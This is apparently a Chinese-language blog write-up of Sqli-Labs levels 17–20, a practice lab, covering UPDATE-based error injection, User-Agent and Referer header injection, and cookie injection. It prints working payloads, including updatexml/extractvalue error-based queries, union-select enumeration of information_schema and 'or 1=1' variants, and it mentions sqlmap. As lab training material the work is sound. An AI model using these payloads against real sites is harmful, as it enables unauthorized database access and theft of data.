Sqli-Labs 17-20详解

最新推荐文章于 2024-05-22 22:54:45 发布
最新推荐文章于 2024-05-22 22:54:45 发布
阅读量399 收藏 1
点赞数
文章标签: 数据库 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58358185/article/details/127833885
版权

less-17

这关是跟换密码,所以涉及到的是update注入,而我们都知道sql语句中update是不会返回数据的,只会返回更新数据成功与失败,所以往往update注入的话是要与报错注入一起进行的

 

这边使用了如下payload却得出了这种错误

admin' and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))#

 

查了一下说是类型错误

所以改成了

-1' and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))#

 

正常爆表,顺利过关

另外使用sqlmap也可以顺利过关

 在此处sqlmap可以顺利找到passwd这个注入点

less-18 头部注入

查看源码

$uagent = $_SERVER['HTTP_USER_AGENT'];

$IP = $_SERVER['REMOTE_ADDR'];

HTTP_USER_AGENT是用来获取用户相关信息,包括了用户浏览器,操作系统工程,是

而我在想REMOTE_ADDR到底是访问者的IP地址还是这个靶场本地地址,因为我的靶场放在物理机上,并且访问的浏览器也是在我本地,所以并不能辨别。

这个时候我选择开启虚拟机来访问我的物理机来确定这个IP地址到底是哪边的。

 

真相了,是靶场所在的IP

言归正传;再看源码

$uname = check_input($_POST['uname']);

$passwd = check_input($_POST['passwd']);

在这个关卡中已经对uname和passwd进行过筛,并且使用sqlmap(level 1)也并没有检测出注入点

因此我们可以把目光转到下面源码

$insert="INSERT INTO security.uagents (uagent, ip_address, username) VALUES ('$uagent', '$IP', $uname)";

在源码中并没有对$uagent和$IP 这两个变量进行过筛,所以这就是我们可以利用的点

但是,这两个变量又体现在通信中的哪个位置呢?此时就需要用burpsuite抓包查看了。

查看数据包

 

但是刚刚页面显示的IP好像是靶场所在的地址,所以基本上可以确定是这个User-Agent了,那么就来试试

 

随便输入看下有没有报错

 

真的报错了,这下稳了。

依照源码中的sql语句构造payload

 

 

得到库名,接下去的就很常规了。

另外需要注意的是上一关update注入的时候是否已经吧密码改了,这关必须是要有正确的账号密码才可以进行注入,

 

如果账号密码不对这边返回的是空,根本无法进行下一步操作。

less-19

吸取上一把的教训,我们这把先登录。

 

发现这么一个东西,它代表什么呢?

抓个包试试:

 

发现与数据包的Referer不能说的一模一样,那可以说是半径八两

referer 是一个常见字段,提供访问来源的信息。HTTP 协议在请求(request)的头信息里面,设计了一个Referer字段,给出"引荐网页"的 URL。就是要告诉服务器,你从哪里来。

 

如果我们从一个空白页面直接输入网址进入就不会有这个Referer了

接下来查看源码

$uagent = $_SERVER['HTTP_REFERER'];

$_SERVER中的HTTP_REFERER参数就是用来判断用户的来路,

 并且接收的数据是要与数据库做交互的,而且这个变量可控,如此一来注入点不就慢慢明朗了吗。再来看看有没有报错点

有报错点,那么现在就来构造payload

1' or (updatexml(1,concat(0x7e,(select database()),0x7e),1)) or '1'='1

 

得到数据库名,接下来的操作就很常规了。

less-20 Cookie注入

吸取上上把的教训,这把依然先登录

 登录后得到这个页面

直接查看源码:

 发现IP跟agent已经没有跟数据库做交互了,

但是有一个东西与数据库做了交互,那就是-----cookie

$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

验证注入点:

Cookie: uname=admin' and 1=1--+ 页面显示正常

Cookie: uname=admin' and 1=2--+ 页面显示异常

接下来就是很常规的一些手法了,注意这边admin记得改,让它无数据回显,不然联合查询的时候数据显示不出来。

Cookie: uname=-1' and 1=1 order by 3--+ 判断字段数

Cookie: uname=-1' and 1=1 union select 1,2,group_concat(table_schema) from information_schema.tables--+爆库

 

后面的常规操作就不说了。

OK今天就先到这。

Wolven_Security
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs第十七关
yuqnqi的博客
05-09 279
查看源码,发现uname被检查了,passwd没有被检查 ,所以尝试使用通过passwd参数进行注入测试。
SQLi Labs Lesson17
1ame的博客
08-15 1143
Lesson - 17 Update Query - Error Based - String 首先进入欢迎界面: 本页面的作用是重置用户的密码。 本节对注入有过滤。 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = sub
sqli-labs(17)
最新发布
2302_78903258的博客
05-22 434
进入第十七关,我们发现页面又进行了变化,显示的是密码重置,又根据题目提示为update,指的是源代码用update的方式进行密码的更新。这里我们用到的是基于update的报错注入。还有,uname的值我们要用它提供的,因为我们用到正确的用户名才能进行密码修改,从而进行注入。这里我们进行注入的参数变成了passwd,原因是passwd这里有注入点,进行了更新语句。这里我只放出了获取emails表下的数据,其他的数据根据你所需要的表再获取。这里我就不介绍他们的用法啦,大家可以看看其他的博主。
SQL注入】sqli-labs手注+sqlmap
m0_63563528的博客
07-19 2119
第一周:SQL注入学习
sqli-labs之sqlmap初体验
rev1ve的博客
08-07 567
为了更深入学习sqlmap,打算对sqli-labs进行SQL注入测试学习内容包括不同的请求方式和请求参数,总之写下这篇博客记录我的学习过程。
在CentOS7中搭建sqli-labs环境以及使用sqlmap对其进行sql注入
m0_53499553的博客
04-04 6821
目录 安装docker 使用docker拉取sqli-labs的镜像 对我们使用到的sqlmap的参数解释 使用Kali中自带的sqlmap进行sql注入 安装docker 因为我们是使用docker去搭建sqli-labs,所以在CentOS7中搭建sqli-labs环境之前需要先安装docker(如果安装过,可以直接去执行安装完docker的后续步骤) 安装需要的软件包,yum-util 提供yum-config-manager实用程序,另外两个是devicemapper驱动依赖的,需要.
Sqlilabs-17
KAKA的博客
07-07 850
来到了 17 关,从这关开始刚学习需要借助源码来配合学习,本关学习内容是 update 内容 从源码中可以看到,开发者的意图流程是: 首先查询用户名相匹配的 users 表中 数据,所以这里如果需要注入首先得有一个在数据库中已经有了的用户名,若是现实挖掘漏洞过程中这,如果可以,可以先自己先注册一个,这下在数据库中就躺着了一个可利用的用户名和密码…,没有的话可以盲猜,如一般都有 admin guest等等可以直接利用的… 继续往下看源码,你会发现 username 身上加了个check_input,转到
sql_labs通关,手动加sqlmap
qq_47289634的博客
02-23 737
信息收集: 数据库版本:version()数据库名字:database() 数据库用户:user() 系统:@@version_compile_os MySQL5.0以上版本自带一个information_schema数据库,储存所有的数据库名表名列名 数据库中 . (点)代表下一级 student.users 代表student数据库中的users表看我另外一篇,点击下方蓝色字体sqlmap详细使用方法id=1,id=2返回类内容不同,输入的内容是带入到数据库里面查询了。 判断类型:这里我把源代码输出了
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
Sqli靶场 11--->22Less
huohaowen的博客
01-29 1600
又是打靶场的一天(靶场球球你别打我)
sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注
07-06 3569
sqlmap-跑盲注靶场】
Sql-labs 前 20 关 通过笔记
weixin_45619494的博客
10-06 440
输入:passwd=admin' and updatexml(1,concat(0x5e,(substr((select database()),1)),0x5e),1) --+直接用 十八关 payload:3',extractvalue(1,concat(0x7e,(select database()),0x7e))) #发现 用 passwd=admin' sleep(6) --+ ,没有延迟,时间盲注可能没用。修改 0x5e 之前 的数字 为 32,63,94,125,即可获得后续内容!
sqli-labs Less11-17
m0_60829468的博客
10-22 1992
目录 一、Less--11 1.观察发现传参方式不再是get,使用burp工具查找注入点。 二、Less-12 1.Less12是闭合规则有所变化——")。其它流程和Less11一致。 三、Less--13 1.13关还是post传参,但是尝试发现只有语句出错时会出现错误日志回显;解决方法有两个:第一种使用extractvalue()函数来做错误日志注入;第二种使用布尔盲注的方法。 ​四、Less--14 1.和Less13一致,闭和规则为"。 五、Less--15 1.测试发现..
sqlmap)【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型
05-26 970
sqllabs靶场】sqlmap
sqli-labs第二十一关详解(这次用sqlmap)
金 帛的博客
05-09 2654
SQL靶场第二十一关答案详解,这次用sqlmap跑
sqli-labs实验指导手册
11-17
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值